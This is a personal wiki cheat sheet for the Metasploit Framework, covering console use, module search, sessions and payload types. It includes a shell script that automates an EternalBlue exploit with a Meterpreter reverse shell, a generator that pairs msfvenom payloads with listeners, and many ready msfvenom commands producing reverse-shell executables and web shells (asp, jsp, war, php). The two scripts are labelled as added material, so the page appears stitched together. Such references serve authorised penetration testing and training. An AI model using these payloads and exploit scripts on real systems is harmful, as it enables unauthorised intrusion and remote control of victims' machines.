The gMan nixWiki

Because the mind is made of Teflon...


Metasploit Framework

Description & Concepts

Free

Metasploit Framework is the free, open-source version of Metasploit, an exploitation framework.

  • Metasploit supports all phases of a penetration testing engagement, from information gathering to post-exploitation.

Concepts

There are three general concepts within the Metasploit framework:

  1. Vulnerability: A design, coding, or logic flaw affecting the target system.
  2. Exploit: A piece of code that takes advantage of a vulnerability present on the target system.
  3. Payload: The code that will run on the target system (delivered by the exploit).

The Console

  • msfconsole starts the program and drops you off at a prompt: msf6 > (or msf5 >)
  • Most ordinary shell commands can also be run from the msf6 prompt (e.g., ls, ping, clear): msfconsole hands anything it does not recognise as a console command to the underlying shell.

4 Main Activities

There are 4 main activities you will most always do when using Metasploit:

  1. Start the console: command line msfconsole
    • Review available options at the msf prompt with: ?.
  2. Select an exploit: this will get you into the target…
    • See a full list: show exploits
    • Search: search [keyword]:[arg] [keyword]:[arg]
  3. Select a payload: this is what you want to do once you're in…
    • See a full list: show payloads
  4. Run the exploit:
    • Set any necessary options first (e.g., RHOSTS for the target, LHOST/LPORT for a reverse payload); show options lists them and flags the required ones.
    • run or exploit launches the module (where the module supports it, check first tests for the vulnerability without exploiting it).
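The four steps above as a replayable resource script, added here as an example (it is not code from the original page or from the Metasploit project). It uses the exploit/windows/smb/ms17_010_eternalblue module that appears further down this page; the 10.10.10.40 / 10.10.14.5 addresses, port 4444 and the /tmp file name are placeholders assumed for the example:

```shell
#!/bin/sh
# Added example, not code from the original page: the console steps above
# (select an exploit, select a payload, set options, run) written as a
# resource script that msfconsole replays with `msfconsole -q -r <file>`.
# The module is the one used further down this page; the RHOSTS/LHOST/LPORT
# values are placeholders chosen for this example.

# build_rc MODULE PAYLOAD RHOSTS LHOST LPORT
# Prints the resource script, one console command per line, in the order
# msfconsole needs: select the module before setting any option, set all
# options before check/exploit.
build_rc() {
    printf 'use %s\n' "$1"
    printf 'set PAYLOAD %s\n' "$2"
    printf 'set RHOSTS %s\n' "$3"
    printf 'set LHOST %s\n' "$4"
    printf 'set LPORT %s\n' "$5"
    # check: ask the module whether the target looks vulnerable before
    # sending anything that could crash it (modules without a check method say so).
    printf 'check\n'
    # -z backgrounds the session as soon as it opens instead of dropping the
    # script into an interactive prompt it cannot drive.
    printf 'exploit -z\n'
    # list what came back so the operator can `sessions -i <id>` afterwards.
    printf 'sessions -l\n'
}

# write_rc FILE MODULE PAYLOAD RHOSTS LHOST LPORT
# Writes the script to FILE and prints the command that replays it
# (-q suppresses the banner).
write_rc() {
    rcfile=$1
    shift
    build_rc "$@" > "$rcfile"
    printf 'msfconsole -q -r %s\n' "$rcfile"
}

# Placeholder addresses: 10.10.10.40 is the target, 10.10.14.5 the attacker.
rc=$(mktemp /tmp/eternalblue.XXXXXX)
write_rc "$rc" exploit/windows/smb/ms17_010_eternalblue \
    windows/x64/meterpreter/reverse_tcp 10.10.10.40 10.10.14.5 4444
cat "$rc"
```

The script only writes the file and prints the msfconsole command; nothing is launched until you run that command yourself, which is the point of reviewing the options before firing.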

Help

  • help [command name] - Shows the help file for the command indicated.
  • history - See a list of commands you used (so you can then do a help [command] on the command you need help with).

Modules & Usage

Search for Module

search [parameters/keyword] - Search the Metasploit Framework database for modules relevant to the given search parameter/keyword.

  • You can conduct searches using CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system type.
  • Example, MS bulletin / CVE: search ms17-010 or search cve:2017-0144 (both find the EternalBlue modules)
  • Example, type: search type:auxiliary telnet

Alternative Search Option: Rapid7 maintains a searchable web-based vulnerability and exploit database listing the same modules with their full paths. Find the module there, then give that full path to use in msfconsole.

info - Show detailed information on the loaded module (description, options, targets, references). You can see info on any module at any time with info followed by the full path to the module.

Parameters (Keywords):

Keyword    Description
app        client or server attack
author     search by module author
bid        search by Bugtraq ID
cve        search by CVE ID
edb        search by Exploit-DB ID
name       search by descriptive name
platform   search by platform (Windows, Linux, etc.)
rank       search by rank (e.g., rank:great)
ref        modules with a specific reference
type       search by module type (exploit, auxiliary, post, payload, encoder, nop, evasion)

Search Result Ranking

You want a Normal ranking or above. Filter search results with the rank keyword, or set a floor globally:

# search for exploits ranked great:
search type:exploit rank:great
# set the same floor globally:
setg MinimumRank great

Rank        Description
Excellent   The exploit will never crash the service. This is the case for SQL injection, command execution, RFI, LFI, etc. No typical memory corruption exploit should be given this ranking unless there are extraordinary circumstances (e.g., WMF Escape()).
Great       The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check.
Good        The exploit has a default target and it is the “common case” for this type of software (English, Windows 7 for a desktop app, 2012 for a server, etc.). The exploit does not auto-detect the target.
Normal      The exploit is otherwise reliable, but depends on a specific version that is not the “common case” for this type of software and can’t (or doesn’t) reliably auto-detect it.
Average     The exploit is generally unreliable or difficult to exploit, but has a success rate of 50% or more for common platforms.
Low         The exploit is nearly impossible to exploit (under 50% success rate) for common platforms.
Manual      The exploit is unstable or difficult to exploit and is basically a DoS (15% success rate or lower). This ranking is also used when the module has no use unless specifically configured by the user (e.g., exploit/unix/webapp/php_eval).

Select Module to Use

use - Select a module to use. Follow use with the full path to the module you want to use or its number in your search result list. Example:

use exploit/windows/smb/ms17_010_eternalblue

# Results in a new, descriptive msf prompt
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >

back - Back out of (de-select, un-use) the module you just selected with use.

Set Options

show options or just options - Shows you the options of the loaded module that you can set.

show advanced or just advanced - Shows you the advanced options of the loaded module that you can set.

set [option name] [value] - Set the module options you need to set.

unset [option name or all] - Unset a specific module option or all of them.

setg [option name] [value] - Set an option globally so every module picks it up by default (e.g., setg LHOST 10.10.14.5 once instead of per module); save writes the global datastore to disk so it survives a restart.

unsetg [option name] - Unset a global option.

Run Module

exploit or run - Launch the module.

  • Side note: run is an alias for exploit, added because “exploit” did not make sense for modules that are not exploits (port scanners, vulnerability scanners, etc.).
  • exploit -z (a nod to the Ctrl-z session key-binding) backgrounds the new session as soon as it opens; exploit -j runs the module itself as a background job, which is how a handler is usually started.

Sessions: Once a vulnerability has been successfully exploited (with exploit or run) a session will be created. A session is the communication channel established between the target system and Metasploit.

  • background or Ctrl-z - at your session prompt (e.g., meterpreter >), this command sends the session to the background (out of your way; you are no longer interacting with it).
  • sessions or sessions -l - lists your current sessions
  • sessions -i [Id number] - bring a session from the background to the foreground to interact with it.
  • sessions -k [Id number] - kill a session (sessions -K kills all of them).

Modules & Categories

[1] Auxiliary

Any supporting module, such as scanners, crawlers and fuzzers. Found here:

/usr/share/metasploit-framework/modules/auxiliary

[2] Encoders

Allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.

  • Encoders can have a limited success rate as antivirus solutions can perform additional checks.
  • Found here:
/usr/share/metasploit-framework/modules/encoders

[3] Evasion

Direct attempts to evade antivirus software.

  • Encoders will encode the payload and thus obfuscate the signature.
  • Evasion modules are an actual direct attempt to evade antivirus software.
/usr/share/metasploit-framework/modules/evasion

[4] Exploits

Modules that… well… exploit. Very neatly organized by target system here:

/usr/share/metasploit-framework/modules/exploits

[5] NOPs

NOPs (No OPeration) do nothing, literally.

  • They are used as padding: a NOP sled in front of the shellcode gives consistent payload sizes and tolerates small errors in where execution lands.
/usr/share/metasploit-framework/modules/nops

[6] Payloads

Payloads are the code that runs on the target system once the exploit has succeeded.

  • Exploits leverage a vulnerability to gain access on a target system, but to achieve our goal we need a payload.
  • Examples: get a shell, load malware, load a backdoor, run a command, etc.
/usr/share/metasploit-framework/modules/payloads

Payloads are split into three categories:

  1. Singles: Self-contained payloads that do not need to download any additional component to run.
  2. Stagers: Set up a connection channel between Metasploit and the target system.
    • Useful when working with staged payloads.
    • Staged payloads will first upload a stager on the target system then download the rest of the payload (in stages).
    • This provides some advantages as the initial size of each stage will be relatively small compared to the full payload.
  3. Stages: Downloaded by the stager. This allows you to use larger payloads such as Meterpreter.

Inline (single) vs. Staged Payloads:

  • An inline (single) payload has the stage and the connection type joined by an underscore (_) in its name.
    • Example: generic/shell_reverse_tcp
  • A staged payload puts the stage and the stager in separate path components (the / between them mirrors the split of the payload into stages).
    • Example: windows/x64/shell/reverse_tcp
  • The handler (exploit/multi/handler) must be set to exactly the payload name that was generated: a stageless binary will not get a usable session from a handler expecting the staged variant, and vice versa.

[7] Post

Post modules are useful during the final, post-exploitation phase. Found here:

/usr/share/metasploit-framework/modules/post

Syntax (Examples)

Two Common Commands

After a successful exploit (assuming your payload was Meterpreter), two commands you will often want to try:

# attempt to escalate to NT AUTHORITY\SYSTEM (Windows only); confirm with getuid
getsystem

# drop into a native OS shell on the target (cmd.exe or /bin/sh); exit returns to meterpreter
shell

msfvenom

See here.

MSF Handler

In msfconsole, the handler that receives the connection from a payload generated with msfvenom should be set up in the following format (PAYLOAD, LHOST and LPORT must match what was passed to msfvenom):

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
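Building the msfvenom command and the handler from one set of values, so the two cannot disagree, as an added example (not code from the original page or from Metasploit). The payload_kind, venom_cmd, handler_cmd and pair functions, the 10.10.14.5 address, the ports and the output file names are assumptions of this example; the staged/stageless test is a heuristic derived from the naming convention described in the Payloads section above:

```shell
#!/bin/sh
# Added example, not code from the original page: generate a payload with
# msfvenom and the exactly matching multi/handler in one go, so the
# staged/stageless choice, LHOST and LPORT cannot drift apart between the
# two. Addresses and file names are placeholders chosen for this example.

# payload_kind NAME -> prints "staged" or "stageless".
# Applies the naming convention from this page: in a staged payload the stage
# and the stager are separate path components (shell/reverse_tcp,
# meterpreter/reverse_tcp); in a single payload they are joined with an
# underscore (shell_reverse_tcp). Platform and architecture components are
# never a stage, so a name whose second-to-last part is one of them is
# stageless. Heuristic only; it is not how Metasploit itself decides.
payload_kind() {
    case "$1" in */*) ;; *) echo stageless; return ;; esac
    stager=${1##*/}
    rest=${1%/*}
    stage=${rest##*/}
    case "$stage" in
        windows|linux|osx|bsd|solaris|unix|android|cmd|java|php|python|ruby|nodejs|generic|multi|x86|x64|aarch64|armle|mipsle|mipsbe)
            echo stageless ;;
        *)
            case "$stager" in
                reverse_*|bind_*) echo staged ;;
                *) echo stageless ;;
            esac ;;
    esac
}

# venom_cmd PAYLOAD LHOST LPORT FORMAT OUTFILE -> prints the msfvenom command.
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' "$1" "$2" "$3" "$4" "$5"
}

# handler_cmd PAYLOAD LHOST LPORT -> prints a one-shot msfconsole invocation.
# -x runs the ;-separated console commands; ExitOnSession false keeps the
# listener up after the first callback; -j -z runs the handler as a
# background job and backgrounds every session it receives.
handler_cmd() {
    printf 'msfconsole -q -x "use exploit/multi/handler; set PAYLOAD %s; set LHOST %s; set LPORT %s; set ExitOnSession false; exploit -j -z"\n' "$1" "$2" "$3"
}

# pair PAYLOAD LHOST LPORT FORMAT OUTFILE -> both commands plus the caveat
# that applies to this kind of payload.
pair() {
    kind=$(payload_kind "$1")
    printf '# %s payload %s\n' "$kind" "$1"
    if [ "$kind" = staged ]; then
        printf '# the binary only carries the stager; the stage is fetched from the handler\n'
    else
        printf '# the binary carries the whole payload; larger, but no second download\n'
    fi
    venom_cmd "$1" "$2" "$3" "$4" "$5"
    handler_cmd "$1" "$2" "$3"
}

pair windows/x64/meterpreter/reverse_tcp 10.10.14.5 4444 exe shell-x64.exe
pair windows/x64/meterpreter_reverse_tcp 10.10.14.5 4445 exe shell-x64-stageless.exe
pair linux/x64/shell_reverse_tcp 10.10.14.5 4446 elf shell-x64.elf
```

Start the printed handler command first, then deliver the generated file; with ExitOnSession false the listener stays up, so several callbacks to the same port each become a separate session that sessions -l shows.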

Non-Meterpreter Binaries

Staged Payloads for Windows

# x86
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

# x64
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

# x86
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

# x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

# x86
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

# x64
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

# x86
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

# x64
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Non-Meterpreter Web Payloads

# asp 
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

# jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

# war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

# php
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Meterpreter Binaries

Staged Payloads for Windows

# x86
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

# x64
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

# x86
msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

# x64
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

# x86
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

# x64
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

# x86
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

# x64
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Meterpreter Web Payloads

# asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

# jsp (there is no Meterpreter JSP payload; this gives a plain reverse shell)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

# war (Java Meterpreter packaged as a deployable WAR)
msfvenom -p java/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

# php
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
cheat_sheets_metasploit.txt · Last modified: 2022/12/31 21:50 by gman